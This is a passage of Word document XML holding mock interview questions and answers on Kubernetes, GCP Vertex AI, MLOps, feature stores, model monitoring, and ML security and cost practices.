        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Separate workloads using namespaces, quotas, priority classes, taints, node pools, and scheduling policies. Give production services higher priority and guaranteed resources. For long-term stability, run batch on dedicated node pools or separate clusters if isolation requirements are strong.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1263. What are priority classes in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Priority classes tell the scheduler which pods are more important. Higher-priority pods can preempt lower-priority pods if resources are scarce. They are useful for protecting critical workloads, but must be used carefully to avoid unnecessary disruption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1264. Scenario: A model-serving API on Kubernetes has cold-start latency. How would you reduce it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Keep minimum replicas warm, preload models during startup, use readiness probes only after the model is ready, optimize image size, and store models close to the cluster. For large models, consider node-local caching, GPU node pools, or dedicated serving frameworks. Measure startup time and request latency separately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1265. How do you monitor ML models in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Monitor service metrics such as latency, errors, throughput, and resource usage, plus ML metrics such as prediction distribution, feature drift, data quality, model confidence, and business outcomes. Capture prediction logs with privacy controls. Alerts should detect both system failure and model quality degradation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1266. Scenario: A model's accuracy drops but infrastructure metrics look healthy. What do you investigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check input data quality, feature drift, label drift, upstream pipeline changes, training-serving skew, model version, and business process changes. Infrastructure health does not guarantee model correctness. The fix may require retraining, rollback, feature pipeline repair, or data contract enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1267. How do you design a feature store on GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A feature store should provide offline features for training and online features for low-latency serving with consistent transformations. On GCP, possible components include BigQuery, Dataflow, Cloud Storage, Vertex AI Feature Store alternatives, Memorystore, or Bigtable depending on latency and scale. Governance should include ownership, freshness, lineage, access control, and quality checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1268. Scenario: Training and serving use different feature logic. What problem does this cause?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: It causes training-serving skew, where the model learns from one version of features but receives different values in production. This can reduce accuracy and create hard-to-debug behavior. Use shared transformation code, feature stores, data validation, and automated tests to keep training and serving consistent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1269. How would you explain a complex production issue in an interview?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a structured story: context, impact, your role, investigation, mitigation, root cause, final fix, validation, and prevention. Include specific tools, metrics, tradeoffs, and communication steps. A strong answer shows ownership and learning, not just technical commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1270. Scenario: You are asked to design a secure self-service platform for developers. What would you include?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Include templates, CI/CD pipelines, Terraform modules, Kubernetes namespaces, GitOps, secrets integration, IAM automation, policy-as-code, observability, cost dashboards, and production readiness checks. The platform should make the secure path the easiest path. Also include documentation, support model, golden paths, and exception handling for advanced teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>GCP Machine Learning and Vertex AI Mock Interview Questions (1081-1120)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1271. How would you design an end-to-end ML pipeline on GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with data ingestion into Cloud Storage or BigQuery, validate data quality, transform features using Dataflow or BigQuery, train models using Vertex AI Training, track metadata, register the model, deploy to Vertex AI Endpoint or GKE, and monitor predictions. Add CI/CD, approval gates, data validation, drift checks, rollback, IAM, and cost controls. A strong answer covers both ML quality and production reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1272. Scenario: A data science team wants to move notebook experiments into production on Vertex AI. What would you do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Convert notebook logic into version-controlled Python modules, package dependencies, create reproducible training jobs, define pipeline steps, and track parameters, datasets, metrics, and artifacts. Then add model registry approval, automated tests, deployment gates, and monitoring. The goal is to move from manual experimentation to repeatable and auditable MLOps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1273. What is Vertex AI Pipelines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Vertex AI Pipelines is a managed service for orchestrating ML workflows using pipeline components. It helps automate steps such as data preprocessing, training, evaluation, model registration, and deployment. It improves reproducibility because each run captures metadata, inputs, outputs, and execution history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1274. How do you decide between Vertex AI, GKE, and Cloud Run for model serving?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Vertex AI Endpoints when you want managed model deployment, autoscaling, versioning, and model monitoring. Use GKE when you need custom serving frameworks, GPUs, sidecars, service mesh, or deeper platform control. Use Cloud Run for lightweight stateless inference services with simple scaling and low operations overhead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1275. Scenario: A Vertex AI endpoint has high latency during peak traffic. How would you troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check request volume, p95/p99 latency, autoscaling behavior, model size, machine type, CPU/GPU utilization, prediction payload size, cold starts, dependency calls, and regional placement. Also compare online prediction latency with model execution time. Fixes may include larger machines, minimum replicas, optimized model format, batching, caching, or colocating dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1276. What is model monitoring in Vertex AI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model monitoring tracks production model behavior such as feature drift, prediction drift, skew, and data quality changes. It helps detect when model performance may degrade after deployment. It should be combined with service metrics like latency, error rate, throughput, and resource usage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1277. Scenario: Vertex AI Model Monitoring detects feature drift. What actions would you take?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First verify whether the drift is real by checking upstream data pipelines, schema changes, missing values, and business context. Then assess impact on model quality using labels or delayed ground truth if available. Depending on severity, trigger retraining, rollback to a previous model, fix the data pipeline, or adjust monitoring thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1278. What is training-serving skew?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Training-serving skew happens when features used during training are calculated differently from features used during online prediction. This can cause production model performance to drop even if offline evaluation was strong. Prevent it with shared feature logic, feature stores, data validation, and tests comparing offline and online feature values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1279. How would you use BigQuery for ML workflows?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: BigQuery can store training data, run feature engineering SQL, perform analytics, and train some models using BigQuery ML. It is useful for large-scale tabular datasets and reproducible feature queries. For production, manage cost with partitioning, clustering, query review, labels, and scheduled pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1280. What is BigQuery ML?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: BigQuery ML lets teams create and run machine learning models directly inside BigQuery using SQL. It is useful for teams that already work heavily in BigQuery and need models such as regression, classification, forecasting, clustering, or anomaly detection. It reduces data movement but may not replace custom training for complex deep learning workloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1281. Scenario: A BigQuery ML training query becomes expensive. How would you optimize it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check scanned bytes, partitions, clustering, SELECT columns, joins, repeated retraining, and whether intermediate tables can be materialized. Use dry runs, query plans, labels, reservations or slots where appropriate, and scheduled training windows. Also confirm the business value justifies the training frequency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1282. How do you secure ML workloads on GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use least-privilege IAM, service accounts per pipeline or workload, VPC Service Controls for sensitive data, CMEK where required, private endpoints, audit logs, secret management, and controlled access to datasets and model artifacts. Avoid broad roles and long-lived keys. Also secure containers, dependencies, and CI/CD pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1283. Scenario: A Vertex AI training job cannot access data in Cloud Storage. How do you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check the service account used by the training job, bucket IAM, object permissions, VPC Service Controls, CMEK permissions, region, and path correctness. Review Cloud Audit Logs for denied permissions. If the job runs in a private network, also verify network and private Google access settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1284. What is a feature store and why is it useful?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A feature store centralizes feature definitions, storage, governance, and serving for ML models. It helps reduce duplicate feature logic and training-serving skew. Good feature stores provide freshness tracking, lineage, ownership, offline access for training, and online low-latency access for inference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1285. How would you design feature freshness monitoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Track the expected update frequency for each feature, compare it with the latest observed timestamp, and alert when freshness violates the SLA. Add dashboards for feature owner, pipeline status, null rates, row counts, and distribution changes. Freshness monitoring is important because stale features can silently hurt model quality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1286. Scenario: Online predictions use stale features. How would you respond?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First confirm impact and identify which feature pipeline is stale. Mitigate by rolling back the model, switching to fallback features, disabling affected predictions, or using a previous feature snapshot if safe. Then fix the upstream pipeline, add freshness alerts, and improve dependency checks before serving.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1287. What are custom training jobs in Vertex AI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Custom training jobs let you run your own training code on managed Vertex AI infrastructure. You can choose machine types, accelerators, containers, Python packages, and distributed training configuration. They are useful when built-in AutoML or BigQuery ML is not flexible enough.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1288. How do you package Python ML training code for Vertex AI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Put code in version control, define clear entry points, manage dependencies with `requirements.txt` or a container image, parameterize inputs and outputs, and write logs/metrics clearly. For repeatability, pin versions, store artifacts in Cloud Storage, and capture metadata in the pipeline or experiment tracker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1289. Scenario: A Vertex AI training job fails only after running for two hours. What would you check?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check logs, memory usage, disk usage, data shard issues, timeout settings, package errors, quota limits, GPU errors, and whether a specific batch or file causes the failure. Add checkpoints so long-running training can resume. Also add smaller validation runs before launching expensive jobs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1290. How do you manage model versions in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a model registry or structured artifact repository to store model version, training data reference, code version, parameters, metrics, approval status, and deployment history. Vertex AI Model Registry can help manage versions and deployment metadata. Strong governance makes rollback and audit easier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1291. Scenario: A newly deployed model performs worse than the previous version. What would you do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Rollback or shift traffic back to the previous model if user impact is significant. Compare offline metrics, online metrics, feature distributions, request segments, and business KPIs. Then review training data, evaluation logic, feature parity, and deployment configuration before trying another rollout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1292. How would you implement canary deployment for ML models?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Deploy the new model to a small percentage of traffic and compare system metrics and business/model metrics against the current model. Monitor latency, errors, prediction distribution, conversion, accuracy proxies, and user impact. Increase traffic gradually only if predefined success criteria are met.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1293. What is batch prediction in Vertex AI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Batch prediction runs inference over large datasets asynchronously, usually reading input from BigQuery or Cloud Storage and writing outputs back to storage. It is useful when real-time latency is not required, such as daily scoring, churn prediction, recommendation refresh, or offline analytics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1294. Scenario: A batch prediction job misses its SLA. How would you troubleshoot?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check input size, machine type, parallelism, quota, region, model load time, output destination, BigQuery or Cloud Storage bottlenecks, and upstream data delays. Compare historical runtime trends. Fixes may include partitioning input, increasing resources, scheduling earlier, optimizing model code, or using a different serving pattern.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1295. How do you control cost for ML workloads on GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Right-size training and serving machines, use autoscaling, schedule jobs only when needed, clean unused endpoints and disks, monitor GPU/TPU utilization, use labels, budgets, and alerts, and optimize BigQuery queries. For experiments, set quotas and lifecycle policies. Cost controls should not compromise reliability or model quality blindly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1296. Scenario: GPU training cost is too high. What would you investigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check GPU utilization, data input bottlenecks, batch size, training duration, checkpoint frequency, experiment duplication, machine type, region availability, and whether distributed training is efficient. Consider preemptible/spot resources for fault-tolerant jobs, mixed precision, smaller models, or better experiment governance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1297. What is AutoML in Vertex AI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: AutoML in Vertex AI lets users train models with less custom code for supported use cases such as tabular, image, text, and video tasks. It is useful for fast baselines and teams without deep ML engineering capacity. Custom training is better when the team needs full control over architecture, code, dependencies, or optimization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1298. How would you compare AutoML and custom training?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: AutoML is faster to start and operationally simpler, but offers less control. Custom training gives full control over model code, features, libraries, tuning, and advanced architectures, but requires more engineering ownership. The choice depends on business requirements, model complexity, team skills, compliance, and production needs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1299. Scenario: A model endpoint must handle sensitive customer data. What architecture would you recommend?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use private networking where possible, least-privilege service accounts, encryption, audit logs, restricted IAM, VPC Service Controls, private endpoints, and clear data retention policies. Avoid logging raw sensitive payloads. Add access reviews, compliance controls, and monitoring for unusual access patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1300. What is Responsible AI in GCP ML systems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Responsible AI means designing ML systems with fairness, explainability, privacy, safety, transparency, and governance in mind. In production, this includes data quality checks, bias evaluation, model cards, approval workflows, audit trails, human review where needed, and monitoring for harmful outcomes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1301. How would you include explainability in a Vertex AI workflow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use explainability tools where supported, capture feature importance or attribution outputs, and make explanations available to reviewers or downstream systems. Include explainability in model evaluation and approval. Explainability is especially important for regulated or high-impact decisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1302. Scenario: A compliance team asks for ML model lineage. What evidence would you provide?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
